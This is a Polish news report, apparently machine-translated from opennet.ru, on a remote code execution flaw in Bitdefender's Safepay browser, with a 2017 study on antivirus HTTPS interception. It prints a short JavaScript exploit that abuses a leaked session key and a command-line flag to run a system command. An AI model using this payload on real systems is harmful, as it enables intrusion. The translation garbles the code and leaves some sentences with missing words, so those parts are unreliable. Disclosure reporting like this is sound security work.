Vladimir Palant, twórca Adblock Plus, () w specjalistycznej przeglądarce internetowej Safepay opartej na silniku Chromium, oferowanej w ramach pakietu antywirusowego Bitdefender Total Security 2020 i mającej na celu zwiększenie bezpieczeństwa pracy użytkownika w sieci globalnej (np. zapewniona jest dodatkowa izolacja podczas dostępu do banków i systemy płatności). Luka umożliwia stronom internetowym otwieranym w przeglądarce wykonanie dowolnego kodu na poziomie systemu operacyjnego.
Przyczyną problemu jest to, że program antywirusowy Bitdefender lokalnie przechwytuje ruch HTTPS, zastępując oryginalny certyfikat TLS witryny. W systemie Klienta instalowany jest dodatkowy certyfikat główny, który umożliwia ukrycie działania wykorzystywanego systemu kontroli ruchu. Antywirus wcina się w chroniony ruch i wstawia na niektóre strony własny kod JavaScript, aby zaimplementować funkcję Bezpiecznego wyszukiwania, a w przypadku problemów z certyfikatem bezpiecznego połączenia zastępuje zwróconą stronę błędu własną. Ponieważ nowa strona błędu jest obsługiwana w imieniu otwieranego serwera, inne strony na tym serwerze mają pełny dostęp do treści wstawianej przez Bitdefender.
Otwierając witrynę kontrolowaną przez atakującego, witryna ta może wysłać żądanie XMLHttpRequest i podczas odpowiadania udawać problemy z certyfikatem HTTPS, co doprowadzi do zwrócenia strony błędu sfałszowanej przez Bitdefender. Ponieważ strona błędu jest otwierana w kontekście domeny atakującego, może on odczytać zawartość fałszywej strony z parametrami Bitdefendera. Strona dostarczona przez Bitdefender zawiera również klucz sesji, który pozwala na użycie wewnętrznego API Bitdefender do uruchomienia oddzielnej sesji przeglądarki Safepay, określenia dowolnych flag linii poleceń i uruchomienia dowolnych poleceń systemowych przy użyciu prefiksu „--utility-cmd-prefix” flaga. Przykład exploita (param1 i param2 to wartości uzyskane ze strony błędu):
var żądanie = nowe XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Typ zawartości", "aplikacja/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami i echo\"");
Przypomnijmy, że badanie przeprowadzone w 2017 r że 24 z 26 przetestowanych produktów antywirusowych sprawdzających ruch HTTPS poprzez fałszowanie certyfikatów obniżyło ogólny poziom bezpieczeństwa połączenia HTTPS.
Tylko 11 z 26 produktów zapewniało aktualne zestawy szyfrów. 5 systemów nie zweryfikowało certyfikatów (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Produkty Kaspersky Internet Security i Total Security stały się celem ataku , a produkty AVG, Bitdefender i Bullguard są atakowane и . Dr.Web Antivirus 11 umożliwia przywrócenie niewiarygodnych szyfrów eksportowych (atak ).
Źródło: opennet.ru